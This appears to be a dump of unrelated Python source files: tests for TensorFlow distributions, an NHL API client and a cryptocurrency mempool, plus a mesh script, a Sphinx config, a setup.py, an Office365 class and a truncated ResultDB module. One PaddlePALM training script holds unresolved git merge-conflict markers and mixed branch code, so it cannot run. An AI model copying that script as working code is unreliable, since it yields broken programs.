[covariance_entry(alpha_v[1], alpha_v[0], alpha_0), variance_entry(alpha_v[1], alpha_0), covariance_entry(alpha_v[1], alpha_v[2], alpha_0)], [covariance_entry(alpha_v[2], alpha_v[0], alpha_0), covariance_entry(alpha_v[2], alpha_v[1], alpha_0), variance_entry(alpha_v[2], alpha_0)]]], dtype=np.float32) with self.test_session(): # ns is shape [4, 1], and alpha is shape [4, 3]. dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha) variance = dist.variance() expected_variance = np.expand_dims( ns * (ns + alpha_0) / (1 + alpha_0), -1) * shared_matrix self.assertEqual((4, 3, 3), variance.get_shape()) self.assertAllClose(expected_variance, variance.eval()) def testVariance_multidimensional(self): alpha = np.random.rand(3, 5, 4).astype(np.float32) alpha2 = np.random.rand(6, 3, 3).astype(np.float32) ns = np.random.randint(low=1, high=11, size=[3, 5, 1]).astype(np.float32) ns2 = np.random.randint(low=1, high=11, size=[6, 1, 1]).astype(np.float32) with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha) dist2 = tf.contrib.distributions.DirichletMultinomial(ns2, alpha2) variance = dist.variance() variance2 = dist2.variance() self.assertEqual((3, 5, 4, 4), variance.get_shape()) self.assertEqual((6, 3, 3, 3), variance2.get_shape()) def testZeroCountsResultsInPmfEqualToOne(self): # There is only one way for zero items to be selected, and this happens with # probability 1. alpha = [5, 0.5] counts = [0., 0] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(0., alpha) pmf = dist.pmf(counts) self.assertAllClose(1.0, pmf.eval()) self.assertEqual((), pmf.get_shape()) def testLargeTauGivesPreciseProbabilities(self): # If tau is large, we are doing coin flips with probability mu. mu = np.array([0.1, 0.1, 0.8], dtype=np.float32) tau = np.array([100.], dtype=np.float32) alpha = tau * mu # One (three sided) coin flip. Prob[coin 3] = 0.8. # Note that since it was one flip, value of tau didn't matter. counts = [0., 0, 1] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(1., alpha) pmf = dist.pmf(counts) self.assertAllClose(0.8, pmf.eval(), atol=1e-4) self.assertEqual((), pmf.get_shape()) # Two (three sided) coin flips. Prob[coin 3] = 0.8. counts = [0., 0, 2] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(2., alpha) pmf = dist.pmf(counts) self.assertAllClose(0.8**2, pmf.eval(), atol=1e-2) self.assertEqual((), pmf.get_shape()) # Three (three sided) coin flips. counts = [1., 0, 2] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(3., alpha) pmf = dist.pmf(counts) self.assertAllClose(3 * 0.1 * 0.8 * 0.8, pmf.eval(), atol=1e-2) self.assertEqual((), pmf.get_shape()) def testSmallTauPrefersCorrelatedResults(self): # If tau is small, then correlation between draws is large, so draws that # are both of the same class are more likely. mu = np.array([0.5, 0.5], dtype=np.float32) tau = np.array([0.1], dtype=np.float32) alpha = tau * mu # If there is only one draw, it is still a coin flip, even with small tau. counts = [1., 0] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(1., alpha) pmf = dist.pmf(counts) self.assertAllClose(0.5, pmf.eval()) self.assertEqual((), pmf.get_shape()) # If there are two draws, it is much more likely that they are the same. counts_same = [2., 0] counts_different = [1, 1.] with self.test_session(): dist = tf.contrib.distributions.DirichletMultinomial(2., alpha) pmf_same = dist.pmf(counts_same) pmf_different = dist.pmf(counts_different) self.assertLess(5 * pmf_different.eval(), pmf_same.eval()) self.assertEqual((), pmf_same.get_shape()) def testNonStrictTurnsOffAllChecks(self): # Make totally invalid input. with self.test_session(): alpha = [[-1., 2]] # alpha should be positive. counts = [[1., 0], [0., -1]] # counts should be non-negative. n = [-5.3] # n should be a non negative integer equal to counts.sum. dist = tf.contrib.distributions.DirichletMultinomial( n, alpha, validate_args=False) dist.pmf(counts).eval() # Should not raise. if __name__ == '__main__': tf.test.main()
py
1a3f5ebf71efac13b5a8db27fb1341f2d22c8c0e
from datetime import date import pytest from nhlapi.endpoints import NHLAPI from nhlapi.utils import Season class MockClient: def get(self, url, params=None): self.url = url self.params = params def test_teams(): mock = MockClient() api = NHLAPI(mock) api.teams(8, expand=["foo", "bar"], stats="single") assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams" assert mock.params["teamId"] == "8" assert mock.params["expand"] == "foo,bar" assert mock.params["stats"] == "single" def test_teams_stats(): mock = MockClient() api = NHLAPI(mock) api.team_stats(8) assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams/8/stats" def test_teams_divisions(): mock = MockClient() api = NHLAPI(mock) api.divisions() assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions" def test_teams_divisions_id(): mock = MockClient() api = NHLAPI(mock) api.divisions(1) assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions/1" def test_teams_conferences(): mock = MockClient() api = NHLAPI(mock) api.conferences() assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences" def test_teams_conferences_id(): mock = MockClient() api = NHLAPI(mock) api.conferences(1) assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences/1" def test_people_simple(): mock = MockClient() api = NHLAPI(mock) api.people(5000) assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000" def test_people_stats(): mock = MockClient() api = NHLAPI(mock) api.people(5000, stats="single", stats_season=Season(end=2018)) assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000/stats" assert mock.params["stats"] == "single" assert mock.params["season"] == "20172018" def test_schedule_date(): mock = MockClient() api = NHLAPI(mock) api.schedule(expand=["foo", "bar"], date=date(2018, 1, 1)) assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule" assert mock.params["expand"] == "foo,bar" assert mock.params["date"] == "2018-01-01" def test_schedule_team_range(): mock = MockClient() api = NHLAPI(mock) api.schedule(8, start_date=date(2018, 1, 1), end_date=date(2018, 6, 1)) assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule" assert mock.params["teamId"] == "8" assert mock.params["startDate"] == "2018-01-01" assert mock.params["endDate"] == "2018-06-01" def test_schedule_bad_args(): mock = MockClient() api = NHLAPI(mock) with pytest.raises(ValueError): api.schedule(date=date.today(), start_date=date(2018, 1, 1), end_date=date(2018, 6, 1)) def test_standings_season(): mock = MockClient() api = NHLAPI(mock) api.standings(expand="foo", season=Season(2017)) assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague" assert mock.params["expand"] == "foo" assert mock.params["season"] == "20172018" def test_standings_date(): mock = MockClient() api = NHLAPI(mock) api.standings(expand="foo", date=date(2017, 1, 1)) assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague" assert mock.params["expand"] == "foo" assert mock.params["date"] == "2017-01-01" def test_standings_bad_args(): mock = MockClient() api = NHLAPI(mock) with pytest.raises(ValueError): api.standings(date=date.today(), season=Season(end=2018))
py
1a3f5ef15827d8b5f9be2376fe533b04efd83bef
import pygmsh as pg from params import height, width, dist_center, inlet_width, inlet_depth, line_sep, ymin1, ymin2 from params import INMOUTH1, INMOUTH2, OUTMOUTH1, OUTMOUTH2, INLET1, INLET2, OUTLET1, OUTLET2, WALLS, DOMAIN def main(): #geom = pg.built_in.Geometry() size = 0.02; geom = pg.opencascade.Geometry( characteristic_length_min=size, characteristic_length_max=size) main_rect = geom.add_rectangle([0.0, 0.0, 0.0], width, height) mouth_inlet1 = geom.add_rectangle([-inlet_depth, ymin1, 0.0], inlet_depth, inlet_width) mouth_inlet2 = geom.add_rectangle([-inlet_depth, ymin2, 0.0], inlet_depth, inlet_width) mouth_outlet1 = geom.add_rectangle([width, ymin1, 0.0], inlet_depth, inlet_width) mouth_outlet2 = geom.add_rectangle([width, ymin2, 0.0], inlet_depth, inlet_width) print("ymin1 :{}".format(ymin1)) print("ymin2 :{}".format(ymin2)) geom.add_physical(mouth_inlet1, INMOUTH1) geom.add_physical(mouth_inlet2, INMOUTH2) geom.add_physical(mouth_outlet1, OUTMOUTH1) geom.add_physical(mouth_outlet2, OUTMOUTH2) geom.add_physical([main_rect], DOMAIN) heat_exchanger = geom.boolean_fragments([main_rect], [mouth_inlet1, mouth_inlet2, mouth_outlet1, mouth_outlet2]) geom.add_raw_code("""vb1[] = Boundary{{Surface{{ {0} }};}}; vb2[] = Boundary{{Surface{{ {1} }};}}; vb3[] = Boundary{{Surface{{ {2} }};}}; vb4[] = Boundary{{Surface{{ {3} }};}}; vb0[] = Boundary{{Surface{{ {4} }};}};""" .format(mouth_inlet1.id, mouth_inlet2.id, mouth_outlet1.id, mouth_outlet2.id, main_rect.id )) geom.add_raw_code("""Physical Curve({0}) = {{vb0[], vb1[0], vb1[2], vb2[0], vb2[2], vb3[0], vb3[2], vb4[0], vb4[2]}};""" .format(WALLS) ) geom.add_raw_code("Physical Curve({0}) -= {{-vb1[1], -vb2[1], -vb3[3], -vb4[3]}};\n \ Physical Curve({1}) = {{vb1[3]}};\n \ Physical Curve({2}) = {{vb3[1]}};\n \ Physical Curve({3}) = {{vb2[3]}};\n \ Physical Curve({4}) = {{vb4[1]}};" .format(WALLS, INLET1, OUTLET1, INLET2, OUTLET2)) mesh = pg.generate_mesh(geom, geo_filename="2D_mesh.geo") import meshio meshio.write("2D_mesh_heat_exchanger.vtk", mesh) if __name__ == '__main__': main()
py
1a3f5f8dd79ee781d36173aed4b460ad09f672be
#!/usr/bin/env python2 # Copyright (c) 2014-2015 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Test resurrection of mined transactions when # the blockchain is re-organized. # from test_framework.test_framework import FatbitTestFramework from test_framework.util import * # Create one-input, one-output, no-fee transaction: class MempoolCoinbaseTest(FatbitTestFramework): def setup_network(self): # Just need one node for this test args = ["-checkmempool", "-debug=mempool"] self.nodes = [] self.nodes.append(start_node(0, self.options.tmpdir, args)) self.is_network_split = False def create_tx(self, from_txid, to_address, amount): inputs = [{ "txid" : from_txid, "vout" : 0}] outputs = { to_address : amount } rawtx = self.nodes[0].createrawtransaction(inputs, outputs) signresult = self.nodes[0].signrawtransaction(rawtx) assert_equal(signresult["complete"], True) return signresult["hex"] def run_test(self): node0_address = self.nodes[0].getnewaddress() # Spend block 1/2/3's coinbase transactions # Mine a block. # Create three more transactions, spending the spends # Mine another block. # ... make sure all the transactions are confirmed # Invalidate both blocks # ... make sure all the transactions are put back in the mempool # Mine a new block # ... make sure all the transactions are confirmed again. b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ] coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ] spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ] spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ] blocks = [] blocks.extend(self.nodes[0].generate(1)) spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ] spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ] blocks.extend(self.nodes[0].generate(1)) # mempool should be empty, all txns confirmed assert_equal(set(self.nodes[0].getrawmempool()), set()) for txid in spends1_id+spends2_id: tx = self.nodes[0].gettransaction(txid) assert(tx["confirmations"] > 0) # Use invalidateblock to re-org back; all transactions should # end up unconfirmed and back in the mempool for node in self.nodes: node.invalidateblock(blocks[0]) # mempool should be empty, all txns confirmed assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id)) for txid in spends1_id+spends2_id: tx = self.nodes[0].gettransaction(txid) assert(tx["confirmations"] == 0) # Generate another block, they should all get mined self.nodes[0].generate(1) # mempool should be empty, all txns confirmed assert_equal(set(self.nodes[0].getrawmempool()), set()) for txid in spends1_id+spends2_id: tx = self.nodes[0].gettransaction(txid) assert(tx["confirmations"] > 0) if __name__ == '__main__': MempoolCoinbaseTest().main()
py
1a3f5fcac8a7a7164338494fdabdbf7924227d74
# flake8: noqa # -*- coding: utf-8 -*- # # Configuration file for the Sphinx documentation builder. # # This file does only contain a selection of the most common options. For a # full list see the documentation: # http://www.sphinx-doc.org/en/master/config # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import datetime import os import re import sys catalyst_root_path = "../" sys.path.insert(0, os.path.abspath(catalyst_root_path)) # -- Project information ----------------------------------------------------- project = "Catalyst" copyright = "{}, Scitator".format(datetime.datetime.now().year) author = "Sergey Kolesnikov" docs_repo = "catalyst" docs_user = "catalyst-team" releases_github_path = "catalyst-team/catalyst" def get_version(mode: str = "full") -> str: """ @TODO: Docs. Contribution is welcome """ current_dir = os.path.abspath(os.path.dirname(__file__)) root = os.path.dirname(current_dir) version_file = os.path.join(root, "catalyst", "__version__.py") if not os.path.exists(version_file): version_file = os.path.join(root, "__version__.py") version_ = "1.0" try: with open(version_file) as f: version_ = re.search( r'^__version__ = [\'"]([^\'"]*)[\'"]', f.read(), re.M ).group(1) except Exception: pass if mode == "short": try: version_ = re.search(r"^(\d+\.\d+)", version_, re.M).group(1) except Exception: pass return version_ # The short X.Y version version = get_version("short") # The full version, including alpha/beta/rc tags release = get_version("full") # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = "1.0" # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named "sphinx.ext.*") or your custom # ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.todo", "sphinx.ext.coverage", "sphinx.ext.mathjax", "sphinx.ext.viewcode", "sphinx.ext.githubpages", "sphinx.ext.napoleon", # "releases", ] autodoc_inherit_docstrings = False napoleon_google_docstring = True napoleon_include_init_with_doc = True napoleon_numpy_docstring = False # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = [".rst", ".md"] source_suffix = ".rst" # The master toctree document. master_doc = "index" # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"] # Ignoring Third-party packages autodoc_mock_imports = [ "alchemy", "neptune", "wandb", "gym", "gridfs", "pymongo", "redis", ] # autodoc_default_flags = [ # "members", "undoc-members", "private-members", # "special-members", "inherited-members", "show-inheritance" # ] # The name of the Pygments (syntax highlighting) style to use. pygments_style = None # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = "catalyst_sphinx_theme" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # html_theme_options = {} # html_theme_options = { # "display_version": True, # "prev_next_buttons_location": "bottom", # "collapse_navigation": False, # "sticky_navigation": True, # "navigation_depth": 4, # } # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". # html_static_path = ["_static"] html_short_title = "Catalyst DL R&D" # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # The default sidebars (for documents that don"t match any pattern) are # defined by theme itself. Builtin themes are using these templates by # default: ``["localtoc.html", "relations.html", "sourcelink.html", # "searchbox.html"]``. # # html_sidebars = {} html_context = { "display_github": True, "source_url_prefix": ( f"https://github.com/{docs_user}/{docs_repo}/tree/master/docs" ), "github_host": "github.com", "github_user": docs_user, "github_repo": docs_repo, "github_version": "master", "conf_py_path": "/docs/", "source_suffix": ".rst", } # -- Options for HTMLHelp output --------------------------------------------- # Output file base name for HTML help builder. htmlhelp_basename = "Catalystdoc" # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ("letterpaper" or "a4paper"). # # "papersize": "letterpaper", # The font size ("10pt", "11pt" or "12pt"). # # "pointsize": "10pt", # Additional stuff for the LaTeX preamble. # # "preamble": "", # Latex figure (float) alignment # # "figure_align": "htbp", } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ ( master_doc, "Catalyst.tex", "Catalyst Documentation", "Scitator", "manual", ), ] # -- Options for manual page output ------------------------------------------ # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [(master_doc, "catalyst", "Catalyst Documentation", [author], 1)] # -- Options for Texinfo output ---------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ( master_doc, "Catalyst", "Catalyst Documentation", author, "Catalyst", "One line description of project.", "Miscellaneous", ), ] # -- Options for Epub output ------------------------------------------------- # Bibliographic Dublin Core info. epub_title = project # The unique identifier of the text. This can be a ISBN number # or the project homepage. # # epub_identifier = "" # A unique identification for the text. # # epub_uid = "" # A list of files that should not be packed into the epub file. epub_exclude_files = ["search.html"] # -- Extension configuration ------------------------------------------------- # -- Options for todo extension ---------------------------------------------- # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = True
py
1a3f6049f0f14056397374f8d92f3e0caf2609e7
# coding=utf-8 import paddlepalm as palm import json if __name__ == '__main__': max_seqlen = 512 batch_size = 4 num_epochs = 2 lr = 1e-3 vocab_path = './pretrain/ernie/vocab.txt' train_file = './data/cls4mrqa/train.tsv' predict_file = './data/cls4mrqa/dev.tsv' config = json.load(open('./pretrain/ernie/ernie_config.json')) # ernie = palm.backbone.ERNIE(...) ernie = palm.backbone.ERNIE.from_config(config) # cls_reader2 = palm.reader.cls(train_file_topic, vocab_path, batch_size, max_seqlen) # cls_reader3 = palm.reader.cls(train_file_subj, vocab_path, batch_size, max_seqlen) # topic_trainer = palm.Trainer('topic_cls', cls_reader2, cls) # subj_trainer = palm.Trainer('subj_cls', cls_reader3, cls) # 创建该分类任务的reader,由诸多参数控制数据集读入格式、文件数量、预处理规则等 cls_reader = palm.reader.ClassifyReader(vocab_path, max_seqlen) <<<<<<< HEAD:test/test2/run.py cls_reader2 = palm.reader.ClassifyReader(vocab_path, max_seqlen) ======= predict_cls_reader = palm.reader.ClassifyReader(vocab_path, max_seqlen, phase='predict') >>>>>>> remotes/upstream/r0.3-api:test/test3/run.py print(cls_reader.outputs_attr) print(predict_cls_reader.outputs_attr) # 不同的backbone会对任务reader有不同的特征要求,例如对于分类任务,基本的输入feature为token_ids和label_ids,但是对于BERT,还要求从输入中额外提取position、segment、input_mask等特征,因此经过register后,reader会自动补充backbone所要求的字段 cls_reader.register_with(ernie) cls_reader2.register_with(ernie) print(cls_reader.outputs_attr) <<<<<<< HEAD:test/test2/run.py print("preparing data...") print(cls_reader.num_examples) cls_reader.load_data(train_file, batch_size) cls_reader2.load_data(train_file, batch_size) ======= print(predict_cls_reader.outputs_attr) print("preparing data...") print(cls_reader.num_examples) cls_reader.load_data(train_file, batch_size, num_epochs=num_epochs) >>>>>>> remotes/upstream/r0.3-api:test/test3/run.py print(cls_reader.num_examples) print('done!') # 创建任务头(task head),如分类、匹配、机器阅读理解等。每个任务头有跟该任务相关的必选/可选参数。注意,任务头与reader是解耦合的,只要任务头依赖的数据集侧的字段能被reader提供,那么就是合法的 cls_head = palm.head.Classify(4, 1024, 0.1) <<<<<<< HEAD:test/test2/run.py cls_head2 = palm.head.Classify(4, 1024, 0.1) # 根据reader和任务头来创建一个训练器trainer,trainer代表了一个训练任务,内部维护着训练进程、和任务的关键信息,并完成合法性校验,该任务的模型保存、载入等相关规则控制 trainer = palm.Trainer('cls') trainer2 = palm.Trainer('senti_cls') mh_trainer = palm.MultiHeadTrainer([trainer, trainer2]) ======= # 根据reader和任务头来创建一个训练器trainer,trainer代表了一个训练任务,内部维护着训练进程、和任务的关键信息,并完成合法性校验,该任务的模型保存、载入等相关规则控制 trainer = palm.Trainer('senti_cls') >>>>>>> remotes/upstream/r0.3-api:test/test3/run.py # match4mrqa.reuse_head_with(mrc4mrqa) # data_vars = cls_reader.build() # output_vars = ernie.build(data_vars) # cls_head.build({'backbone': output_vars, 'reader': data_vars}) <<<<<<< HEAD:test/test2/run.py loss_var = mh_trainer.build_forward(ernie, [cls_head, cls_head2]) n_steps = cls_reader.num_examples * num_epochs // batch_size warmup_steps = int(0.1 * n_steps) print(warmup_steps) sched = palm.lr_sched.TriangularSchedualer(warmup_steps, n_steps) ======= loss_var = trainer.build_forward(ernie, cls_head) # controller.build_forward() # Error! a head/backbone can be only build once! Try NOT to call build_forward method for any Trainer! # n_steps = cls_reader.num_examples * num_epochs // batch_size # warmup_steps = int(0.1 * n_steps) # print(warmup_steps) # sched = palm.lr_sched.TriangularSchedualer(warmup_steps, n_steps) sched = None >>>>>>> remotes/upstream/r0.3-api:test/test3/run.py adam = palm.optimizer.Adam(loss_var, lr, sched) mh_trainer.build_backward(optimizer=adam, weight_decay=0.001) # mh_trainer.random_init_params() mh_trainer.load_pretrain('pretrain/ernie/params') # trainer.train(iterator_fn, print_steps=1, save_steps=5, save_path='outputs', save_type='ckpt,predict') <<<<<<< HEAD:test/test2/run.py mh_trainer.fit_readers_with_mixratio([cls_reader, cls_reader2], 'cls', 2) mh_trainer.train(print_steps=1) # trainer.save() ======= trainer.fit_reader(cls_reader) trainer.train(print_steps=1) # trainer.save() print('prepare to predict...') pred_ernie = palm.backbone.ERNIE.from_config(config, phase='pred') cls_pred_head = palm.head.Classify(4, 1024, phase='pred') trainer.build_predict_forward(pred_ernie, cls_pred_head) predict_cls_reader.load_data(predict_file, 8) print(predict_cls_reader.num_examples) predict_cls_reader.register_with(pred_ernie) trainer.fit_reader(predict_cls_reader, phase='predict') print('predicting..') trainer.predict(print_steps=20) # controller = palm.Controller([mrqa, match4mrqa, mlm4mrqa]) # loss = controller.build_forward(bb, mask_task=[]) # n_steps = controller.estimate_train_steps(basetask=mrqa, num_epochs=2, batch_size=8, dev_count=4) # adam = palm.optimizer.Adam(loss) # sched = palm.schedualer.LinearWarmup(learning_rate, max_train_steps=n_steps, warmup_steps=0.1*n_steps) # # controller.build_backward(optimizer=adam, schedualer=sched, weight_decay=0.001, use_ema=True, ema_decay=0.999) # controller.random_init_params() # controller.load_pretrain('../../pretrain_model/ernie/params') # controller.train() # controller = palm.Controller(config='config.yaml', task_dir='tasks', for_train=False) # controller.pred('mrqa', inference_model_dir='output_model/secondrun/mrqa/infer_model') >>>>>>> remotes/upstream/r0.3-api:test/test3/run.py
py
1a3f60672243893de1a93f2d81a10224abd387a3
from setuptools import setup, find_packages setup( name='pf-python-communication', version='1.0', url='https://github.com/problemfighter/pf-python-communication', license='Apache 2.0', author='Touhid Mia', author_email='[email protected]', description='Problem Fighter Python Communication helper, such as Websocket, Email, push notification etc', long_description=__doc__, packages=find_packages(), zip_safe=False, include_package_data=True, platforms='any', install_requires=[ "flask-socketio" ], classifiers=[ 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache 2.0 License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Software Development :: Libraries :: Python Modules' ] )
py
1a3f6074b7bbca6bc04fbae383572fcdb2f689f1
from office365.directory.identities.userflows.b2x_identity_user_flow import B2XIdentityUserFlow from office365.directory.identities.identity_provider_base import IdentityProviderBase from office365.entity import Entity from office365.entity_collection import EntityCollection from office365.runtime.resource_path import ResourcePath class IdentityContainer(Entity): @property def identity_providers(self): return self.properties.get('identityProviders', EntityCollection(self.context, IdentityProviderBase, ResourcePath("identityProviders", self.resource_path))) @property def b2x_user_flows(self): return self.properties.get('b2xUserFlows', EntityCollection(self.context, B2XIdentityUserFlow, ResourcePath("b2xUserFlows", self.resource_path)))
py
1a3f613ed41900ad3d85011a2532bb8f8ae7082e
# Copyright 2020 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """This module is for processing test results from resultdb""" import base64 import logging from collections import defaultdict from common.findit_http_client import FinditHttpClient from go.chromium.org.luci.resultdb.proto.v1 import test_result_pb2 from infra_api_clients import http_client_util from libs.test_results.base_test_results import BaseTestResults from libs.test_results.classified_test_results import ClassifiedTestResults from services import resultdb _FAILURE_STATUSES = [ test_result_pb2.TestStatus.FAIL, test_result_pb2.TestStatus.CRASH, test_result_pb2.TestStatus.ABORT ] _FINDIT_HTTP_CLIENT = FinditHttpClient() class ResultDBTestType(object): OTHER = 'OTHER' GTEST = 'GTEST' BLINK = 'BLINK' # TODO (crbug/981066): Implement this # pylint: disable=abstract-method class ResultDBTestResults(BaseTestResults): def __init__(self, test_results, partial_result=False): """Creates a ResultDBTestResults object from resultdb test results Arguments: test_results: Array of luci.resultdb.v1.TestResult object partial_result: False if the results are from a single shard, True if the results are from all shards """ self.partial_result = partial_result self.test_results = ResultDBTestResults.group_test_results_by_test_name( test_results) def GetFailedTestsInformation(self): failed_test_log = {} reliable_failed_tests = {} for test_name, result in self.test_results.items(): if result["reliable_failure"]: test_type = result["test_type"] # TODO(crbug.com/981066): Consider running this in parallel real_logs = map( lambda l: ResultDBTestResults.get_detailed_failure_log( test_type, l), result["failure_logs"]) merged_test_log = '\n'.join(real_logs) failed_test_log[test_name] = base64.b64encode(merged_test_log) reliable_failed_tests[test_name] = test_name return failed_test_log, reliable_failed_tests @property def contains_all_tests(self): """ True if the test result is merged results for all shards; False if it's a partial result. """ return not self.partial_result def test_type(self): for _, result in self.test_results.items(): return result["test_type"] return ResultDBTestType.OTHER def GetClassifiedTestResults(self): """Parses ResultDB results, counts and classifies test results. Also counts number of expected and unexpected results for each test. Returns: (ClassifiedTestResults) An object with information for each test: * total_run: total number of runs, * num_expected_results: total number of runs with expected results, * num_unexpected_results: total number of runs with unexpected results, * results: classified test results in 5 groups: passes, failures, skips, unknowns, notruns. """ classified_results = ClassifiedTestResults() for test_name, test_info in self.test_results.items(): # We don't care about the tests that were skipped on purpose if (test_info["num_passed"] == 0 and test_info["num_failed"] == 0 and test_info["num_crashed"] == 0 and test_info["num_aborted"] == 0 and test_info["num_notrun"] == 0 and test_info["num_unspecified"] == 0): continue classified_results[test_name].total_run = test_info["total_run"] classified_results[test_name].num_expected_results = test_info[ "num_expected_results"] classified_results[test_name].num_unexpected_results = test_info[ "num_unexpected_results"] if test_info["num_passed"]: classified_results[test_name].results.passes['PASS'] = test_info[ "num_passed"] if test_info["num_failed"]: classified_results[test_name].results.failures['FAIL'] = test_info[ "num_failed"] if test_info["num_crashed"]: classified_results[test_name].results.failures['CRASH'] = test_info[ "num_crashed"] if test_info["num_aborted"]: classified_results[test_name].results.failures['ABORT'] = test_info[ "num_aborted"] if test_info["num_skipped"]: classified_results[test_name].results.skips['SKIP'] = test_info[ "num_skipped"] if test_info["num_notrun"]: classified_results[test_name].results.notruns['SKIP'] = test_info[ "num_notrun"] if test_info["num_unspecified"]: classified_results[test_name].results.unknowns[ 'UNSPECIFIED'] = test_info["num_unspecified"] return classified_results def GetTestLocation(self, test_name): """Gets test location for a specific test. Returns: A tuple containing * A dictionary of { "line": line number of the test "file": file path to the test } * A possible error string """ location = self.test_results.get(test_name, {}).get('test_location') if not location: return None, 'test location not found' return location, None def DoesTestExist(self, test_name): return test_name in self.test_results def IsTestResultUseful(self): return len(self.test_results) > 0 @staticmethod def group_test_results_by_test_name(test_results): # pylint: disable=line-too-long """Returns a dictionary of { <test_name>:{ "reliable_failure": whether the test fail consistently "failure_logs": array of dictionary { "name": test result name (e.g. invocations/task-chromium-swarm.appspot.com-508dcba4306cae11/tests/ninja:%2F%2Fgpu:gl_tests%2FSharedImageGLBackingProduceDawnTest.Basic/results/c649f775-00777) "summary_html": summary_html of a run } "test_type": type of test "test_location": location of the test "total_run": number of runs for the test "num_expected_results": number of expected runs "num_unexpected_results": number of unexpected runs "num_passed": number of passed results "num_failed": number of failed results "num_crashed": number of crashed results "num_aborted": number of aborted results "num_skipped": number of skipped results "num_notrun": number of not run results "num_unspecified": number of unspecified results } } Arguments: test_results: Array of ResultDB TestResult object """ results = defaultdict(dict) for test_result in test_results: test_name = ResultDBTestResults.test_name_for_test_result(test_result) if not test_name: continue is_failure = ResultDBTestResults.is_failure(test_result) log = { "name": test_result.name, "summary_html": ResultDBTestResults.summary_html_for_test_result(test_result) } if not results.get(test_name): results[test_name] = { "reliable_failure": is_failure, "failure_logs": [log] if is_failure else [], "test_type": ResultDBTestResults.test_type_for_test_result(test_result), "test_location": ResultDBTestResults.test_location_for_test_result(test_result), "total_run": 0, "num_expected_results": 0, "num_unexpected_results": 0, "num_passed": 0, "num_failed": 0, "num_crashed": 0, "num_aborted": 0, "num_skipped": 0, "num_notrun": 0, "num_unspecified": 0, } else: results[test_name]["reliable_failure"] = results[test_name][ "reliable_failure"] and is_failure if is_failure: results[test_name]["failure_logs"].append(log) ResultDBTestResults._update_classified_test_results( results[test_name], test_result) return results @staticmethod def _update_classified_test_results(classified_results, test_result): """Update classified_results with a test result object Arguments: classified_results: A dictionary containing results for a test ID test_result: A luci.resultdb.v1.TestResult object """ classified_results["total_run"] += 1 if test_result.expected: classified_results["num_expected_results"] += 1 else: classified_results["num_unexpected_results"] += 1 if test_result.status == test_result_pb2.TestStatus.PASS: classified_results["num_passed"] += 1 elif test_result.status == test_result_pb2.TestStatus.FAIL: classified_results["num_failed"] += 1 elif test_result.status == test_result_pb2.TestStatus.CRASH: classified_results["num_crashed"] += 1 elif test_result.status == test_result_pb2.TestStatus.ABORT: classified_results["num_aborted"] += 1 elif test_result.status == test_result_pb2.TestStatus.SKIP: if test_result.expected: classified_results["num_skipped"] += 1 else: classified_results["num_notrun"] += 1 else: classified_results["num_unspecified"] += 1 @staticmethod def is_failure(test_result): return test_result.status in _FAILURE_STATUSES and not test_result.expected @staticmethod def test_name_for_test_result(test_result): """Returns the test name for luci.resultdb.v1.TestResult object Arguments: test_result: A 